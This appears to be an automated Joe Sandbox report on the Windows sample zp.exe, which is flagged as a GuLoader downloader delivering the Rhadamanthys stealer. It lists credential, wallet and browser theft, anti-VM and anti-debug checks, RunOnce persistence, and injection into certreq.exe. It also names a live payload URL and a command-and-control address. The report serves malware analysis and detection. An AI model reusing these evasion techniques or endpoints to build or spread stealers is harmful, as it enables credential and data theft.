Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zp.exe

Overview

General Information

Sample Name:zp.exe
Analysis ID:879710
MD5:849acb6881494898ff4a18a4a0fbdb43
SHA1:1d7fe1693e30deb8ec2d4f2dc04e7c083fd53ab3
SHA256:f069f56e5597954dce10aff5fdaef9d3ba60bf8ebd996793c47193ecafba4481
Infos:

Detection

GuLoader, RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected RHADAMANTHYS Stealer
Yara detected AntiVM3
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Deletes itself after installation
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Sleep loop found (likely to delay execution)
Detected potential crypto function
Stores files to the Windows start menu directory
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • zp.exe (PID: 6380 cmdline: C:\Users\user\Desktop\zp.exe MD5: 849ACB6881494898FF4A18A4A0FBDB43)
    • zp.exe (PID: 7940 cmdline: C:\Users\user\Desktop\zp.exe MD5: 849ACB6881494898FF4A18A4A0FBDB43)
      • certreq.exe (PID: 2560 cmdline: C:\Windows\system32\certreq.exe MD5: 9E5EA30E8DF2A24833FDB9F2D673C41A)
        • conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • WerFault.exe (PID: 6904 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7940 -s 1468 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000003.6285988556.00000000000D2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    00000000.00000002.5790793651.0000000006DAD000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: zp.exe PID: 7940JoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        Process Memory Space: zp.exe PID: 7940JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: zp.exeVirustotal: Detection: 14%Perma Link
          Source: zp.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Binary string: mshtml.pdb source: zp.exe, 00000002.00000001.5590107650.0000000000649000.00000020.00000001.01000000.00000006.sdmp
          Source: Binary string: mshtml.pdbUGP source: zp.exe, 00000002.00000001.5590107650.0000000000649000.00000020.00000001.01000000.00000006.sdmp
          Source: C:\Users\user\Desktop\zp.exeCode function: 0_2_00405FE2 FindFirstFileA,FindClose,0_2_00405FE2
          Source: C:\Users\user\Desktop\zp.exeCode function: 0_2_0040559E CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559E
          Source: C:\Users\user\Desktop\zp.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\CacheJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\AdobeJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Adobe\AcrobatJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DCJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIAJump to behavior
          Source: Joe Sandbox ViewIP Address: 203.175.174.69 203.175.174.69
          Source: global trafficHTTP traffic detected: GET /rh/rh.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Host: bluemaxxlaser.com
          Source: global trafficTCP traffic: 192.168.11.20:49756 -> 45.66.230.155:2537
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: unknownTCP traffic detected without corresponding DNS query: 45.66.230.155
          Source: zp.exe, 00000002.00000002.6347310970.00000000036AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bluemaxxlaser.com/
          Source: zp.exe, 00000002.00000003.6283703653.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000002.6347310970.00000000036AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bluemaxxlaser.com/rh/rh.bin
          Source: zp.exe, 00000002.00000002.6347310970.0000000003668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bluemaxxlaser.com/rh/rh.bin.
          Source: zp.exe, 00000002.00000002.6359786003.0000000032E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://bluemaxxlaser.com/rh/rh.binApoasNatalramsyadvocates.com/rh/rh.bin
          Source: zp.exe, 00000002.00000002.6347310970.0000000003668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bluemaxxlaser.com/rh/rh.bine
          Source: zp.exe, 00000002.00000002.6347310970.0000000003668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bluemaxxlaser.com/rh/rh.bineQ%d
          Source: zp.exe, 00000002.00000002.6347310970.00000000036AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bluemaxxlaser.com/rh/rh.binrU
          Source: zp.exe, 00000002.00000001.5590107650.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
          Source: text-x-generic-template.png.0.drString found in binary or memory: http://jimmac.musichall.czif
          Source: zp.exe, Unchurch.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: zp.exe, Unchurch.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: zp.exe, 00000002.00000001.5590107650.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
          Source: zp.exe, 00000002.00000001.5590107650.0000000000626000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
          Source: zp.exe, 00000002.00000001.5590107650.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
          Source: zp.exe, 00000002.00000001.5590107650.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
          Source: certreq.exe, 00000005.00000003.6633428832.00000215CFE62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com
          Source: certreq.exe, 00000005.00000003.6633428832.00000215CFE62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com
          Source: certreq.exe, 00000005.00000003.6521668733.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6632256371.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6625019609.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6517161518.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6631091124.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6546018409.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6549917437.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6587995571.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6594375401.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6586715711.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6613298341.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6509817279.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6565214935.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6522814593.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6622501624.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6511122104.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6567804977.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6562592625.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6504772908.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6626224955.00000215CFE62000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6605536412.00000215CFE62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://http:///etc/puk.keyGET13ConnectionupgradeUpgradewebsocketUser-AgentAccept-Encodinggzip
          Source: certreq.exe, 00000005.00000003.6495131172.00000215CFD8F000.00000004.00000020.00020000.00000000.sdmp, certreq.exe, 00000005.00000003.6502645292.00000215CFD86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://http:///etc/puk.keyMachineGuid
          Source: zp.exe, 00000002.00000001.5590107650.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
          Source: unknownDNS traffic detected: queries for: bluemaxxlaser.com
          Source: global trafficHTTP traffic detected: GET /rh/rh.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Host: bluemaxxlaser.com
          Source: C:\Users\user\Desktop\zp.exeCode function: 0_2_00405107 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405107
          Source: zp.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\zp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7940 -s 1468
          Source: C:\Users\user\Desktop\zp.exeCode function: 0_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403217
          Source: C:\Users\user\Desktop\zp.exeFile created: C:\Windows\resources\0409Jump to behavior
          Source: C:\Users\user\Desktop\zp.exeCode function: 0_2_004049460_2_00404946
          Source: C:\Users\user\Desktop\zp.exeCode function: 0_2_004062B80_2_004062B8
          Source: C:\Windows\System32\certreq.exeCode function: 5_3_00000215CE004A105_3_00000215CE004A10
          Source: C:\Windows\System32\certreq.exeCode function: 5_3_00000215CE0027925_3_00000215CE002792
          Source: C:\Windows\System32\certreq.exeCode function: 5_3_00000215CE001B9C5_3_00000215CE001B9C
          Source: C:\Windows\System32\certreq.exeCode function: 5_3_00000215CE002C325_3_00000215CE002C32
          Source: C:\Windows\System32\certreq.exeCode function: 5_3_00000215CE005E545_3_00000215CE005E54
          Source: C:\Windows\System32\certreq.exeCode function: 5_3_00000215CE0055545_3_00000215CE005554
          Source: C:\Windows\System32\certreq.exeCode function: 5_3_00000215CE0058D45_3_00000215CE0058D4
          Source: C:\Windows\System32\certreq.exeCode function: 5_3_00000215CE0024ED5_3_00000215CE0024ED
          Source: C:\Windows\System32\certreq.exeCode function: 5_3_00000215CE0030A7 RtlRestoreThreadPreferredUILanguages,RtlAllocateHeap,RtlAllocateHeap,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor,5_3_00000215CE0030A7
          Source: zp.exe, 00000000.00000000.4817564292.0000000000475000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemeibomian Oppegaaende.exe4 vs zp.exe
          Source: zp.exe, 00000002.00000000.5588949008.0000000000475000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemeibomian Oppegaaende.exe4 vs zp.exe
          Source: zp.exeBinary or memory string: OriginalFilenamemeibomian Oppegaaende.exe4 vs zp.exe
          Source: C:\Users\user\Desktop\zp.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\zp.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\System32\certreq.exeSection loaded: edgegdi.dllJump to behavior
          Source: zp.exeVirustotal: Detection: 14%
          Source: C:\Users\user\Desktop\zp.exeFile read: C:\Users\user\Desktop\zp.exeJump to behavior
          Source: zp.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\zp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\zp.exe C:\Users\user\Desktop\zp.exe
          Source: C:\Users\user\Desktop\zp.exeProcess created: C:\Users\user\Desktop\zp.exe C:\Users\user\Desktop\zp.exe
          Source: C:\Users\user\Desktop\zp.exeProcess created: C:\Windows\System32\certreq.exe C:\Windows\system32\certreq.exe
          Source: C:\Windows\System32\certreq.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\zp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7940 -s 1468
          Source: C:\Users\user\Desktop\zp.exeProcess created: C:\Windows\System32\certreq.exe C:\Windows\system32\certreq.exeJump to behavior
          Source: C:\Users\user\Desktop\zp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\zp.exeFile created: C:\Users\user\VkstcentreneJump to behavior
          Source: C:\Users\user\Desktop\zp.exeFile created: C:\Users\user\AppData\Local\Temp\nsf4051.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/7@1/2
          Source: C:\Users\user\Desktop\zp.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
          Source: C:\Users\user\Desktop\zp.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\zp.exeCode function: 0_2_0040440A GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040440A
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
          Source: C:\Users\user\Desktop\zp.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:304:WilStaging_02
          Source: C:\Windows\System32\certreq.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\OutlookJump to behavior
          Source: Binary string: mshtml.pdb source: zp.exe, 00000002.00000001.5590107650.0000000000649000.00000020.00000001.01000000.00000006.sdmp
          Source: Binary string: mshtml.pdbUGP source: zp.exe, 00000002.00000001.5590107650.0000000000649000.00000020.00000001.01000000.00000006.sdmp

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000000.00000002.5790793651.0000000006DAD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\zp.exeCode function: 0_2_10002D40 push eax; ret 0_2_10002D6E
          Source: C:\Users\user\Desktop\zp.exeCode function: 2_3_0007582C push ebp; iretd 2_3_0007582D
          Source: C:\Users\user\Desktop\zp.exeCode function: 2_3_00073854 push eax; ret 2_3_00073955
          Source: C:\Users\user\Desktop\zp.exeCode function: 2_3_00074ABD push dword ptr [edx+ebp+3Bh]; retf 2_3_00074ACA
          Source: C:\Users\user\Desktop\zp.exeCode function: 2_3_000738BC push eax; ret 2_3_00073955
          Source: C:\Users\user\Desktop\zp.exeCode function: 2_3_00075323 push es; retf 2_3_00075324
          Source: C:\Users\user\Desktop\zp.exeCode function: 2_3_00075366 push esp; retf 2_3_00075376
          Source: C:\Users\user\Desktop\zp.exeCode function: 2_3_00072F9A push esi; retf 2_3_00072F9B
          Source: C:\Users\user\Desktop\zp.exeCode function: 2_3_00072FA6 push es; retf 2_3_00072FAF
          Source: C:\Users\user\Desktop\zp.exeCode function: 2_3_000753EE pushad ; ret 2_3_000753F1
          Source: C:\Users\user\Desktop\zp.exeCode function: 0_2_00406009 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406009
          Source: C:\Users\user\Desktop\zp.exeFile created: C:\Users\user\AppData\Local\Temp\nsq8C22.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\zp.exeFile created: C:\Users\user\AppData\Local\Temp\subfolder1\Unchurch.exeJump to dropped file
          Source: C:\Users\user\Desktop\zp.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\LangustJump to behavior
          Source: C:\Users\user\Desktop\zp.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\GradeJump to behavior
          Source: C:\Users\user\Desktop\zp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
          Source: C:\Users\user\Desktop\zp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
          Source: C:\Users\user\Desktop\zp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior
          Source: C:\Users\user\Desktop\zp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup keyJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\System32\certreq.exeFile deleted: c:\users\user\desktop\zp.exeJump to behavior
          Source: C:\Users\user\Desktop\zp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\certreq.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\certreq.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: Yara matchFile source: 00000002.00000003.6285988556.00000000000D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: zp.exe PID: 7940, type: MEMORYSTR
          Source: C:\Users\user\Desktop\zp.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Users\user\Desktop\zp.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003396D000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HOOKEXPLORER.EXE
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003396D000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AUTORUNSC.EXE
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003396D000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
